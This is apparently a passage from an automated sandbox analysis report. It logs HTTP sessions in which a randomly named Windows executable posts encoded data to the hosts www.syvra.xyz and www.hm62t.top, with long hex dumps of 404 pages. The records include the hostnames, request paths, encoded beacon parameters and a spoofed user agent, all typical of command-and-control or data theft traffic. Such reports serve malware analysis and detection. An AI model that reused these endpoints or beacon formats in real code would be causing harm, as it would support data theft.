                    Sep 22, 2024 17:40:37.650404930 CEST1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20
                    Data Ascii: ;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16
                    Sep 22, 2024 17:40:37.650470972 CEST1236INData Raw: 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37
                    Data Ascii: 6.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.115
                    Sep 22, 2024 17:40:37.650512934 CEST1236INData Raw: 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20
                    Data Ascii: .474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path i
                    Sep 22, 2024 17:40:37.650557041 CEST672INData Raw: 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b
                    Data Ascii: display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142
                    Sep 22, 2024 17:40:37.655469894 CEST1236INData Raw: 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 65 6c 6c 69 70 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 34 2e 36 37 31 35 37 31 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20
                    Data Ascii: ty:1;" /> <ellipse ry="4.6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rul


                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                    7          | 192.168.2.4 | 49744       | 162.0.213.94   | 80               | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:40:39.606311083 CEST | 10829 | OUT | POST /h2bb/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.syvra.xyz
                    Origin: http://www.syvra.xyz
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.syvra.xyz/h2bb/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 72 31 70 77 36 31 51 4d 6f 54 56 4e 2f 6f 74 76 6f 49 69 73 70 4f 78 43 7a 4b 31 5a 61 30 68 71 50 34 61 63 42 75 36 59 35 68 31 64 79 30 49 2b 4a 2f 55 66 68 30 76 32 79 68 66 50 4a 57 67 78 69 35 56 75 4e 6a 6d 78 30 46 43 39 45 38 43 77 77 61 75 4d 55 33 6c 39 69 4d 6a 42 6b 71 6f 32 59 52 31 68 58 67 39 63 52 46 77 51 70 7a 31 70 72 54 70 50 53 37 33 59 58 70 6c 41 57 6f 6e 68 6d 6d 30 4c 45 6b 76 74 4b 77 41 4e 6c 4b 69 6d 67 65 6c 45 66 2f 31 38 6b 33 55 33 48 4c 67 72 64 6a 41 74 66 64 2b 47 74 55 4e 68 38 42 47 61 4e 62 32 74 49 6a 47 64 42 54 6e 65 68 66 54 71 78 52 45 39 58 45 74 71 43 62 49 75 34 49 70 36 71 68 35 35 6f 41 6d 44 50 79 2f 44 44 78 53 57 36 44 46 72 6c 52 38 79 53 34 32 62 42 39 70 55 33 66 61 57 74 44 2b 49 51 64 75 42 61 4f 6d 6f 77 43 6f 57 71 41 6c 44 68 74 51 5a 54 58 41 4f 76 56 52 61 45 49 41 58 50 31 36 44 49 48 38 47 68 74 4c 4b 44 71 37 61 39 6c 63 56 63 37 4b 6e 35 36 49 4e 78 58 68 61 73 33 4e 61 55 57 31 65 5a 4f 4c [TRUNCATED]
                    Data Ascii: 6X=nLi3hk6LsWGqr1pw61QMoTVN/otvoIispOxCzK1Za0hqP4acBu6Y5h1dy0I+J/Ufh0v2yhfPJWgxi5VuNjmx0FC9E8CwwauMU3l9iMjBkqo2YR1hXg9cRFwQpz1prTpPS73YXplAWonhmm0LEkvtKwANlKimgelEf/18k3U3HLgrdjAtfd+GtUNh8BGaNb2tIjGdBTnehfTqxRE9XEtqCbIu4Ip6qh55oAmDPy/DDxSW6DFrlR8yS42bB9pU3faWtD+IQduBaOmowCoWqAlDhtQZTXAOvVRaEIAXP16DIH8GhtLKDq7a9lcVc7Kn56INxXhas3NaUW1eZOLyM7AESox421PPWFIRxxF5PV4i50/00YPfqtwNfAt0N15I4pC+uD6PaJcikMCId8ZcQdxB6ZweQzph/KH7/n4UL0UYCVjuSsGOZCpC33UDFka4iH5dLltAYshMAhBezFyhRgiyP8VQkRs8lEhV7jdHo/EuigrQUthCJBm7WyzZWPV+U2xmHXuNv/za66GFPnxU3NMO7BmoA/PFE+nBgV13GfInbIAsGPkS12ewehVJOqtlpLkvT5lrUSDvhDzydLujPHe2kGXvQT/DfvrfDW8CrUOht1iPhxUq4aNx48u26HIpDqr1ABUSOPwwl7iXHNm4R6/vpFOKOr3Woyb9Uvm7qoETcM9R1D/Go86Uhz/c3X3eheE0He3G8IGWRj9kvl4JeczzaRTbGJ45IVCTkz/Ft2KkJqbvuaV2b1dCIUP4+yfIzPSrEu04lkVKf0RpuuQBEMsAwnA/uYeK1y+gAYsar2gi//BbO/WTbKVwGCiY44TX819sTraPz4Z7yvKcLhhUrAYtGtj1lc9dH6roNgwPYB0IADXQHFuLfU86Hr+nNV9DwgfAgaw2SXmMlb592YtYWhq2EbFZe/mtRGzx8pqmmPIBm2uJGFsDs42WOelaTbosYimZSsYLBTeKhU3QlLCRK8jDiV3/XClpeTWdsw6SeXtudVhXBlSGH [TRUNCATED]
                    Sep 22, 2024 17:40:40.218364000 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:40:40 GMT
                    Server: Apache
                    X-Frame-Options: SAMEORIGIN
                    Content-Length: 16052
                    X-XSS-Protection: 1; mode=block
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                    Sep 22, 2024 17:40:40.218390942 CEST224INData Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67
                    Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transfo
                    Sep 22, 2024 17:40:40.218410015 CEST1236INData Raw: 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 30 31 35 30 36 38 37 2c 30 2c 30 2c 31 31 2e 31 39 33 39 32 33 2c 2d 31 2e 33 38 39 35 39 34 35 2c 2d 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c
                    Data Ascii: rm="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263
                    Sep 22, 2024 17:40:40.218425989 CEST1236INData Raw: 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20
                    Data Ascii: e-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914
                    Sep 22, 2024 17:40:40.218444109 CEST1236INData Raw: 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74
                    Data Ascii: 475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433
                    Sep 22, 2024 17:40:40.218461037 CEST1236INData Raw: 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                    Data Ascii: 46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.4
                    Sep 22, 2024 17:40:40.218744993 CEST1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                    Data Ascii: ;stroke-opacity:1;" /> <path id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.
                    Sep 22, 2024 17:40:40.218760014 CEST552INData Raw: 2e 32 33 35 36 39 33 2c 32 33 2e 34 38 38 33 35 20 30 2e 32 33 35 36 39 33 2c 33 36 2e 35 35 30 37 32 20 2d 31 30 65 2d 37 2c 31 33 2e 30 36 32 33 38 20 2d 30 2e 31 31 37 38 33 33 2c 32 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e
                    Data Ascii: .235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stro
                    Sep 22, 2024 17:40:40.218776941 CEST1236INData Raw: 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30 2e 30 37 37 30 36 20 2d 30 2e 32 39 34 37 38 39 2c 32 2e 32 39 39 30 31 20 2d 30 2e 34 31 32 35 36 37 2c 35 2e 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39
                    Data Ascii: 9092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke
                    Sep 22, 2024 17:40:40.218791008 CEST224INData Raw: 2e 33 35 38 32 36 2c 2d 30 2e 31 37 36 37 32 20 36 2e 34 32 33 33 2c 2d 30 2e 31 37 36 37 32 20 39 2e 34 38 37 30 32 2c 2d 30 2e 35 38 39 32 32 20 33 2e 30 36 33 37 32 2c 2d 30 2e 34 31 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34
                    Data Ascii: .35826,-0.17672 6.4233,-0.17672 9.48702,-0.58922 3.06372,-0.41251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
                    Sep 22, 2024 17:40:40.225579977 CEST1236INData Raw: 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31
                    Data Ascii: e-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;st


                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                    8          | 192.168.2.4 | 49745       | 162.0.213.94   | 80               | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:40:42.147308111 CEST | 479 | OUT | GET /h2bb/?6X=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.syvra.xyz
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:40:42.733640909 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:40:42 GMT
                    Server: Apache
                    X-Frame-Options: SAMEORIGIN
                    Content-Length: 16052
                    X-XSS-Protection: 1; mode=block
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                    Sep 22, 2024 17:40:42.733659983 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20
                    Data Ascii: style="stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path
                    Sep 22, 2024 17:40:42.733676910 CEST1236INData Raw: 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 30 31 35 30 36 38 37 2c 30 2c 30 2c 31 31 2e 31 39 33 39 32 33 2c 2d 31 2e 33 38 39 35 39 34 35 2c 2d 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20
                    Data Ascii: transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d=
                    Sep 22, 2024 17:40:42.733692884 CEST1236INData Raw: 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f
                    Data Ascii: roke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0
                    Sep 22, 2024 17:40:42.733720064 CEST1236INData Raw: 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e
                    Data Ascii: e-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.
                    Sep 22, 2024 17:40:42.733741045 CEST672INData Raw: 33 33 32 34 34 20 38 2e 34 39 39 39 36 36 2c 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                    Data Ascii: 33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.2249
                    Sep 22, 2024 17:40:42.733757973 CEST1236INData Raw: 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20
                    Data Ascii: troke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33
                    Sep 22, 2024 17:40:42.733778954 CEST1236INData Raw: 38 35 39 34 20 37 2e 32 39 31 39 36 34 2c 32 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31
                    Data Ascii: 8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934
                    Sep 22, 2024 17:40:42.733795881 CEST448INData Raw: 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30
                    Data Ascii: 5064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                    Sep 22, 2024 17:40:42.733874083 CEST1236INData Raw: 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33
                    Data Ascii: 298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;st
                    Sep 22, 2024 17:40:42.738723040 CEST1236INData Raw: 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36
                    Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    9           192.168.2.4  49746        154.23.184.240  80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:40:48.565804005 CEST  727                OUT        POST /edpl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.hm62t.top/edpl/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
